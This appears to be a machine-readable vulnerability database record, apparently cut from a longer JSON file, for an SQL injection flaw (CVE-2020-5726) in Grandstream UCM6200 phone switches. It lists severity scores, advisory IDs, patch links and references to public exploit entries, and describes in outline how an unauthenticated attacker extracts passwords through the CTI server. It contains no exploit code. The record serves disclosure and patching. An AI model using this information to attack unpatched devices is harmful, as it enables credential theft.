"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003471",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-24401",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003471",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5726",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003471",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-24401",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1716",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "CNVD",
"id": "CNVD-2020-24401"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5726",
"trust": 3.0
},
{
"db": "TENABLE",
"id": "TRA-2020-17",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "156977",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-24401",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "48270",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1716",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"id": "VAR-202003-1439",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
}
]
},
"last_update_date": "2023-12-18T12:17:13.076000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-24401)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/215057"
},
{
"title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113111"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "NVD",
"id": "CVE-2020-5726"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.tenable.com/security/research/tra-2020-17"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/156977/grandstream-ucm6200-series-cti-interface-sql-injection.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5726"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5726"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/48270"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"date": "2020-03-30T20:15:20.180000",
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"date": "2020-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"date": "2020-03-31T17:15:26.887000",
"db": "NVD",
"id": "CVE-2020-5726"
},
{
"date": "2020-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6200 In the series SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
],
"trust": 0.6
}
}